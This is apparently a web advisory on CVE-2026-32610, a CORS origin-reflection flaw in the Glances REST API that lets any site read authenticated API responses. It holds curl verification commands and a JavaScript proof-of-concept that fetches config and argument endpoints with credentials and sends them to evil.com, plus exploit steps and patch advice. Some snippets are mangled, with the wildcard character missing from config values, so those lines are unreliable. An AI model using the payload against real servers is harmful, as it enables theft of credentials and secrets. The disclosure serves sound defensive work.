Glances (Starlette CORSMiddleware) CORS Origin Reflection Vulnerability CVE-2026-32610 (High) -DC-Jun2026-464

Listen to this Post

How CVE-2026-32610 Works

The Glances REST API web server, prior to version 4.5.2, ships with a default CORS (Cross-Origin Resource Sharing) configuration that sets `allow_origins=[“”]` combined with allow_credentials=True. According to the CORS specification, browsers must reject responses that include both `Access-Control-Allow-Origin: ` and `Access-Control-Allow-Credentials: true` — this combination is explicitly forbidden because it would allow any website to make authenticated cross-origin requests.
However, Starlette’s `CORSMiddleware` implements a workaround: when `allow_origins=[“”]` and allow_credentials=True, instead of returning the literal “ wildcard, the middleware reflects the requesting `Origin` header value back in the `Access-Control-Allow-Origin` response header. This means the server echoes whatever origin the attacker provides, while simultaneously sending Access-Control-Allow-Credentials: true.

The issue manifests as follows:

  • An attacker hosts a malicious page on `https://evil.com`.
  • A victim who has an active authenticated session with a Glances instance (via browser Basic Auth or other cookie-based authentication) visits the attacker’s page.
  • The malicious JavaScript executes a `fetch()` request to the Glances API endpoint (e.g., http://glances-server:61208/api/4/config`) withcredentials: “include”`.
  • The browser automatically attaches the stored credentials (Basic Auth headers, cookies, etc.) to the request.
  • Starlette’s `CORSMiddleware` sees the request `Origin: https://evil.com` and responds with:
  • `Access-Control-Allow-Origin: https://evil.com`
    – `Access-Control-Allow-Credentials: true`
    – The browser, seeing that the reflected origin matches the requesting page’s origin and that credentials are allowed, permits JavaScript to read the full response body.
  • The attacker exfiltrates sensitive data such as system monitoring information, configuration secrets, command-line arguments (which may contain passwords and API keys), and more.
    The preflight (OPTIONS) request for non-simple requests also echoes the requested headers back, approving credentialed requests for methods like POST and custom headers. When Glances runs without the `–password` flag (the default for most internal network deployments), no authentication is required at all, making any website capable of directly reading all API endpoints.

DailyCVE Form

| Field | Value |

|-|-|

| Platform | Glances REST API (Starlette CORSMiddleware) |

| Version | < 4.5.2 |

| Vulnerability | CORS origin reflection with credentials |

| Severity | High (CVSS 8.1) |

| Date | 2026-03-18 |

| Prediction | Already patched in v4.5.2 (2026-03-14) |

What Undercode Say

Analytics & Verification Commands

Start Glances web server (default, no password)
glances -w
Verify CORS headers from a malicious origin
curl -s -D- -o /dev/null \
-H "Origin: https://evil.com" \
http://localhost:61208/api/4/all
Expected response headers:
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true
Verify data theft without authentication
curl -s http://localhost:61208/api/4/all | python -m json.tool | head -20
curl -s http://localhost:61208/api/4/config | python -m json.tool
curl -s http://localhost:61208/api/4/args | python -m json.tool
With authentication enabled, verify credentialed requests work
glances -w --password
curl -s -D- -o /dev/null \
-X OPTIONS \
-H "Origin: https://evil.com" \
-H "Access-Control-Request-Method: GET" \
-H "Access-Control-Request-Headers: Authorization" \
http://localhost:61208/api/4/all
Expected: Access-Control-Allow-Origin: https://evil.com
Expected: Access-Control-Allow-Credentials: true

Proof-of-Concept (JavaScript)

<!-- steal-glances.html hosted on attacker's server -->

<script>
async function steal() {
const target = "http://glances-server:61208";
// Steal system stats (processes, CPU, memory, network, disk)
const all = await fetch(target + "/api/4/all", { credentials: "include" });
const allData = await all.json();
// Steal configuration (may contain database passwords, API keys)
const config = await fetch(target + "/api/4/config", { credentials: "include" });
const configData = await config.json();
// Steal command line args (contains password hash, SNMP creds)
const args = await fetch(target + "/api/4/args", { credentials: "include" });
const argsData = await args.json();
// Exfiltrate to attacker
fetch("https://evil.com/collect", {
method: "POST",
body: JSON.stringify({ all: allData, config: configData, args: argsData })
});
}
steal();
</script>

Exploit

An attacker can exploit this vulnerability in four simple steps:
1. Host a malicious page on a domain they control (e.g., https://evil.com/steal.html`).
2. Lure a victim who has an active authenticated session with a Glances instance to visit that page. The victim may have authenticated via the browser's Basic Auth dialog (which caches credentials) or via cookies.
3. Execute cross-origin requests from the malicious page to the Glances API endpoints using `fetch()` with
credentials: “include”. The browser automatically attaches the stored credentials.
4. Exfiltrate the response data — the server reflects the attacker's origin in `Access-Control-Allow-Origin` and allows credentials, so the browser grants full read access to the response. The attacker can then steal system stats, configuration files, command-line arguments, and even perform state-changing operations like clearing event logs or modifying process monitoring.
With Glances running without `--password` (the default), no authentication is required, making the attack trivial — any website visited by a user on the same network can silently read all API endpoints.
<h2 style="color: blue;">Protection</h2>
To mitigate this vulnerability, apply one of the following fixes:
1. Upgrade to Glances version 4.5.2 or later, which addresses this issue.
2. Change the default CORS credentials setting to `False` in
glances/outputs/glances_restful_api.py:

cors_credentials = config.get_bool_value('outputs', 'cors_credentials', default=False) Changed from True

3. When credentials are required, configure explicit allowed origins instead of using the wildcard:

cors_origins = config.get_list_value('outputs', 'cors_origins', default=["https://trusted-domain.com"])

4. Reject the insecure combination at startup by warning and forcing `cors_credentials = False` whencors_origins == [“”].
5. Restrict allowed methods to only those necessary (e.g., `["GET"]` instead of
[“”]).
<h2 style="color: blue;">Impact</h2>
- Without `--password` (default): Any website visited by a user on the same network can silently read all Glances API endpoints, including complete system monitoring data (process list with command lines, CPU/memory/disk stats, network interfaces, filesystem mounts, Docker container info), configuration file contents (which may contain database passwords, export backend credentials, API keys), and command-line arguments.
- With
–password: If the user has previously authenticated via the browser's Basic Auth dialog (which caches credentials), any website can make cross-origin requests that carry those cached credentials. This allows exfiltration of all the above data plus the password hash itself (via/api/4/args).
- Network reconnaissance: An attacker can use this to map internal network infrastructure by having victims visit a page that probes common Glances ports (61208) on internal IPs.
- State-changing attacks: The CORS policy also allows POST methods, enabling an attacker to clear event logs (
/api/4/events/clear/all) or modify process monitoring (/api/4/processes/extended/{pid}`).
– CVSS Score: 8.1 (High) — Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top